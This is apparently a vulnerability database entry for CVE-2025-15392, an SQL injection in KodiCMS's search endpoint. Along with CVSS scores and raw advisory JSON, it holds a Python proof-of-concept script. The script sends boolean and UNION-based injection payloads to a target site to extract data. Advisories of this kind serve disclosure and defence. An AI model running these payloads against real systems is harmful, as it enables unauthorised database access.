Security Vulnerability Report
中文
CVE-2025-15392 CVSS 6.3 MEDIUM

CVE-2025-15392

Published: 2025-12-31 18:15:44
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A weakness has been identified in Kohana KodiCMS up to 13.82.135. This affects the function like of the file cms/modules/pages/classes/kodicms/model/page.php of the component Search API Endpoint. Executing manipulation of the argument keyword can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:kodicms-kohana:kodicms:*:*:*:*:*:*:*:* - VULNERABLE
Kohana KodiCMS <= 13.82.135

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-15392 SQL Injection PoC for Kohana KodiCMS # Target: Search API Endpoint in cms/modules/pages/classes/kodicms/model/page.php def exploit_sql_injection(target_url, keyword): """ Exploit SQL injection in KodiCMS Search API target_url: Base URL of KodiCMS installation keyword: SQL injection payload """ endpoint = f"{target_url}/search" params = {'keyword': keyword} try: response = requests.get(endpoint, params=params, timeout=10) print(f"[*] Sending payload: {keyword}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") return response.text except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None def test_blind_injection(target_url): """ Test for boolean-based blind SQL injection """ # True condition payload true_payload = "' OR '1'='1" # False condition payload false_payload = "' AND '1'='2" print("[*] Testing blind SQL injection...") true_resp = exploit_sql_injection(target_url, true_payload) false_resp = exploit_sql_injection(target_url, false_payload) if true_resp and false_resp and len(true_resp) != len(false_resp): print("[+] Blind SQL injection confirmed!") return True return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com/kodicms") sys.exit(1) target = sys.argv[1].rstrip('/') # Basic test exploit_sql_injection(target, "test") # Blind injection test test_blind_injection(target) # Example: Extract database version version_payload = "' UNION SELECT NULL,@@version,NULL-- " print(f"\n[*] Extracting database version...") exploit_sql_injection(target, version_payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15392", "sourceIdentifier": "[email protected]", "published": "2025-12-31T18:15:43.823", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Kohana KodiCMS up to 13.82.135. This affects the function like of the file cms/modules/pages/classes/kodicms/model/page.php of the component Search API Endpoint. Executing manipulation of the argument keyword can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha identificado una debilidad en Kohana KodiCMS hasta 13.82.135. Esto afecta a la función 'like' del archivo cms/modules/pages/classes/kodicms/model/page.php del componente Search API Endpoint. La ejecución de la manipulación del argumento 'keyword' puede conducir a inyección SQL. Es posible lanzar el ataque remotamente. El exploit ha sido puesto a disposición del público y podría ser explotado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kodicms-kohana:kodicms:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.82.135", "matchCriteriaId": "521BDE1B-2B7B-40BC-87C8-9099CE621098"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.339161", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339161", "source": "cna@vuldb ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.